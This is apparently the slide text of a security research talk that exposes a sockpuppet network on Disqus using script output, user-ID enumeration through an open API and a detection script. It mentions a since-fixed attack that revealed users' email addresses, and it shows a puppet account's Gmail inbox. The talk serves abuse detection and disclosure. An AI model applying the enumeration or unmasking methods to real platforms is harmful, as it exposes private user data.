• Accounts had been registered within minutes of each 
other. 

• Their usernames and profile names had a regular 
pattern: 

• Username: <Firstname><Surname> 

• Profile name: <Firstname> <Surname> 



(venv)abbot:maltego marco$ python unmask.py -v 2919407889 1540287681 like
Disqus Unmasker
marco@thinkst.com

[*] Looking up comment 1540287681
[*] Looking up voters on comment 1540287681
NatalyaMcalpin - Natalya Mcalpin (109616253) 2014-06-05T17:46:08 117d
NerissaNiel - Nerissa Niel (109616261) 2014-06-05T17:46:13 117d
OdessaOgilvie - Odessa Ogilvie (109616307) 2014-06-05T17:46:32 117d
PaigeSwanger - Paige Swanger (109616327) 2014-06-05T17:46:42 117d
PaulinaPrivett - Paulina Privett (109616340) 2014-06-05T17:46:48 117d
RandaBallance - Randa Ballance (109616381) 2014-06-05T17:47:07 117d
RodgerRansom - Rodger Ransom (109616473) 2014-06-05T17:47:41 117d
RogerReddix - Roger Reddix (109616481) 2014-06-05T17:47:46 117d
SorayaPiotrowski - Soraya Piotrowski (109616699) 2014-06-05T17:49:34 117d
TeriClerk - Teri Clerk (109616781) 2014-06-05T17:50:07 117d
TerinaTurrell - Terina Turrell (109616790) 2014-06-05T17:50:13 117d
ThaoMcanulty - Thao Mcanulty (109616811) 2014-06-05T17:50:22 117d
TyrellTennyson - Tyrell Tennyson (109616851) 2014-06-05T17:50:40 117d
VertieValliere - Valliere (109616881) 2014-06-05T17:50:54 117d

disqus_0xkykFPm7E - TheTruth (117719302) 2014-08-11T00:45:34 50d

Guests Likes: 23
(venv)abbot:maltego marco$



[Screenshot: a comment posted 5 days ago and the pop-up list of accounts that voted for it, including Rodger Ransom, Rosette Richards, Russell Dipaolo and Theodora Tippin]

Not exactly convincing

What about their email addresses?

(Hint: you really shouldn't be able to retrieve a Disqus
user's email address)

We found an unmask attack that
returns an email address for a
profile name*

*Already reported and fixed

Supposed puppets had emails
in the form:
<Firstname><Surname>@gmail.com

We had our suspicions, but thought
the puppet army would be larger.

Time to enumerate.

User Enumeration

Disqus users get a unique ID

This ID is a counter (yay!)

There are unrestricted APIs to query user information (yay! yay!)

• https://disqus.com/api/3.0/users/details.json

We can look up email addresses for each enumerated user with our
unmask attack (yay! yay! yay!)

So we pick a lower and upper bound beyond the lowest and highest
known puppet IDs, making a range of 5k users.

• Pull details for all users.

5k users. Now what?

Filter on known values:

• Must have username, name and email patterns, and
not be verified.

• Age is already taken into account with the ID, so less
relevant.



marco@playpen:~$ grep gmail.com users-109614253-109618253.txt | grep '.*([A-Z][A-Za-z]\+).*' |

[Terminal output: one line per matching account, giving progress percentage, user ID, email address, (username), account age in days and registration timestamp]



[Figure: inter-registration time vs. registration number]
So

• Accounts with
  • Patterned profile names
  • Patterned usernames
  • Patterned emails
  • Similar registration times
  • Regular inter-registration delays
  • Alphabetical progression in usernames



Disqus lets us map usernames to forums where they're active

[Screenshot columns: Disqus Username, Disqus Forum Name]

Disqus also lets us map usernames to comments*

*Including "Private" profiles








TeraTaveras OnitaStrahan TheolaBach RodgerRansom YajairaSaia

PaulinaPrivett

"There no hasbaRats defending the indefensible"



So

• Accounts with
  • Patterned profile names
  • Patterned usernames
  • Patterned emails
  • Similar registration times
  • Regular inter-registration delays
  • Alphabetical progression in usernames

• And
  • Active on the same set of sites
  • Shared duplicate comments across accounts
  • Vote for each other's comments to push them up
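
The signals listed above can be checked mechanically. The following is an added example, not code from the talk: it flags bursts of registrations that arrive at regular intervals with alphabetically ordered usernames, then lists comments shared across the flagged accounts. All account names, timestamps, comments and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed sample records (not data from the talk): (username, registered_at)
REGISTRATIONS = [
    ("mike_r",    "2014-06-05T09:12:40"),
    ("AnnaAble",  "2014-06-05T17:36:03"),
    ("BethBaker", "2014-06-05T17:36:07"),
    ("CaraCole",  "2014-06-05T17:36:12"),
    ("DinaDrew",  "2014-06-05T17:36:17"),
    ("EllaEast",  "2014-06-05T17:36:22"),
    ("zed99",     "2014-06-05T17:51:30"),
]
# Constructed comments: (username, text)
COMMENTS = [
    ("AnnaAble", "This article is biased!"),
    ("CaraCole", "this article is  biased!"),
    ("mike_r",   "Interesting read."),
]

# Thresholds are illustrative assumptions, not values from the talk.
def find_batches(regs, max_gap=10, max_jitter=2.0, min_size=4):
    """Return username runs registered in a burst, at regular delays, in alphabetical order."""
    rows = sorted((datetime.fromisoformat(t), u) for u, t in regs)
    if not rows: return []
    runs, run = [], [rows[0]]
    for prev, cur in zip(rows, rows[1:]):
        if (cur[0] - prev[0]).total_seconds() <= max_gap:
            run.append(cur)            # still inside the same registration burst
        else:
            runs.append(run)
            run = [cur]
    runs.append(run)
    flagged = []
    for run in runs:
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(run, run[1:])]
        names = [u.lower() for _, u in run]
        if len(run) >= min_size and pstdev(gaps) <= max_jitter and names == sorted(names):
            flagged.append([u for _, u in run])
    return flagged

def shared_comments(comments, accounts):
    """Map each normalised comment text to the flagged accounts that posted it (2+ only)."""
    by_text = defaultdict(set)
    for user, text in comments:
        if user in accounts:
            by_text[" ".join(text.lower().split())].add(user)
    return {t: sorted(u) for t, u in by_text.items() if len(u) > 1}
```

Each signal alone is weak; the burst is flagged only when timing regularity and name ordering coincide, and the duplicate-comment check is then restricted to those accounts.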



Puppet army size: 186 confirmed
Period of activity: Four months (2014-06-5)
Comments posted: 7269
Unique comments: 5782 (1487 dups)
Primary targeted forums: CNN, Al Jazeera, Jerusalem Post



What are they saying?

Consistent multi-faceted views

• Pro-Palestine
• Anti-Israel
• Anti-ISIS/L
• Writes "We (USA)", presents as Western
• Anti-Syria
• Anti-Obama
• Pro-Islam (Writes "I am Christian and I know that Christianity is worst religion in the world" :)



So who is this?

No idea. Anything is pure speculation.

Ways out?

Shut down this puppet army


[Screenshot: Gmail inbox for the account SorayaPiotrowski, listing a Disqus digest, a Disqus comment notification and a "Disqus Password Reset Confirmation" message]

[Screenshot: Disqus inbox for Soraya Piotrowski, showing upvote notifications]



Disqus limiting their API. 
(This would be a bad idea.) 






• Puppetry is very likely happening in other places.
• But without the same amount of data, we can't tell.
• Disqus' open data approach is great for identifying these relationships and patterns, and we want to give them shouts for it.
• (But fix the unmask attacks.)



Summary 






• Without exception, all of the UGC sites we have looked at have proven to be fairly trivial to manipulate
• It is clear that this abuse is already taking place on many of them
• Be aware of it;
• Build tools to help deal with it;




thinkst applied research

{azhar|marco|haroon}@thinkst.com

research@thinkst.com



